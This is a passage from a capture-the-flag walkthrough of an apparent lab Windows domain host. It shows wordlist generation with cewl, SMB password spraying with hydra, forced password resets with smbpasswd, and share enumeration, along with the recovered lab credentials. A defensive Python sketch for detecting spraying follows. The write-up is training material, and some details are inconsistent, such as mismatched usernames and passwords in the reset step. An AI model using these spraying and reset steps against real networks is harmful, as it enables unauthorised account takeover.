# 5 spray passwd

```
# smb doesn't connect
# ldap needs auth

# time to cewl
$ cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers -w pass.txt

# ssh - nothing
$ hydra -L users -P pass.txt smb://10.10.10.193
[DATA] attacking smb://10.10.10.193:445/
[445][smb] Host: 10.10.10.193 Account: tlavel Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193   login: tlavel   password: Fabricorp01
[445][smb] Host: 10.10.10.193 Account: bnielson Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193   login: bnielson   password: Fabricorp01
[445][smb] Host: 10.10.10.193 Account: bhult Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193   login: bhult   password: Fabricorp01


# trying smbclient
$ smbclient -L 10.10.10.193 -U tlavel
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

$ smbclient -L 10.10.10.193 -U bnielson
Enter WORKGROUP\bnielson's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

$ smbclient -L 10.10.10.193 -U bhult
Enter WORKGROUP\bhult's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

# we need to change the password using smbpasswd on kali
$ smbpasswd -r 10.10.10.193 -U tlavel
Old SMB password:
New SMB password: kashz
Retype new SMB password: kashz
machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria.

# there's a password policy that we need to follow
# changing to Fabricorp02

$ smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password: Fabricorp01
New SMB password: Fabricorp05
Retype new SMB password: Fabricorp05
Password changed for user tlavel

$ smbclient -U tlavel -L //10.10.10.193
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_LOGON_FAILURE

# trying other users
# fails for bhult also
| bnielson works

$ smbclient -U bnielson%Fabricorp05 -L //10.10.10.193

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        HP-MFT01        Printer   HP-MFT01
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share
		
# every 1-2 min the password is reset and has to be changed to a different one, as reusing the same one gives this error:
| machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..

$ smbclient -U bnielson%Fabricorp05 //10.10.10.193/HP-MFT01
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

$ smbclient -U bnielson%Fabricorp05 //10.10.10.193/SYSVOL
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri May 29 16:29:09 2020
  ..                                  D        0  Fri May 29 16:29:09 2020
  fabricorp.local                    Dr        0  Fri May 29 16:29:09 2020
  
smb: \fabricorp.local\> dir
  .                                   D        0  Fri May 29 16:35:39 2020
  ..                                  D        0  Fri May 29 16:35:39 2020
  DfsrPrivate                      DHSr        0  Fri May 29 16:35:39 2020
  Policies                            D        0  Fri May 29 16:29:19 2020
  scripts                             D        0  Fri May 29 16:29:09 2020

# cannot view DfsrPrivate
# scripts is empty
# Policies contains policy-related information

# nothing in smb
```
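Seen from the defender's side, the hydra run above is one source failing logons against many accounts, and each `NT_STATUS_PASSWORD_MUST_CHANGE` reply means the guessed password was correct. The sketch below is an added example, not part of the original writeup. It assumes failed logons are exported with the NTSTATUS sub-status that Windows records in event 4625; the event tuples, the 192.0.2.x addresses, the `user_a`/`user_b`/`jdoe` accounts and the thresholds are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# NTSTATUS sub-status values seen on failed logons (Windows event 4625).
BAD_PASSWORD = "0xc000006a"   # wrong password
MUST_CHANGE = "0xc0000224"    # STATUS_PASSWORD_MUST_CHANGE: the guess was correct
EXPIRED = "0xc0000071"        # STATUS_PASSWORD_EXPIRED: the guess was correct
PASSWORD_KNOWN = {MUST_CHANGE, EXPIRED}

# Constructed sample events: (timestamp, source IP, account, sub-status).
SAMPLE_EVENTS = [
    ("2020-06-01T10:00:01", "192.0.2.10", "user_a", BAD_PASSWORD),
    ("2020-06-01T10:00:02", "192.0.2.10", "tlavel", MUST_CHANGE),
    ("2020-06-01T10:00:03", "192.0.2.10", "user_b", BAD_PASSWORD),
    ("2020-06-01T10:00:04", "192.0.2.10", "bnielson", MUST_CHANGE),
    ("2020-06-01T10:00:05", "192.0.2.10", "bhult", MUST_CHANGE),
    ("2020-06-01T10:07:00", "192.0.2.44", "jdoe", BAD_PASSWORD),  # one user mistyping
    ("2020-06-01T10:09:00", "192.0.2.44", "jdoe", BAD_PASSWORD),
]

def detect_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Flag sources that fail logons against many distinct accounts in one window."""
    by_source = defaultdict(list)
    for ts, src, account, status in events:
        by_source[src].append((datetime.fromisoformat(ts), account.lower(), status.lower()))
    findings = []
    for src, rows in by_source.items():
        rows.sort()
        best = set()
        # Slide a window from each event and keep the widest set of accounts seen.
        for i, (start, _, _) in enumerate(rows):
            seen = {acct for t, acct, _ in rows[i:] if t - start <= window}
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_accounts:
            # Accounts whose failure code proves the password is known: reset these first.
            exposed = sorted({a for _, a, s in rows if s in PASSWORD_KNOWN})
            findings.append({"source": src, "accounts": len(best), "exposed": exposed})
    return findings

if __name__ == "__main__":
    for finding in detect_spray(SAMPLE_EVENTS):
        print(finding)
```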

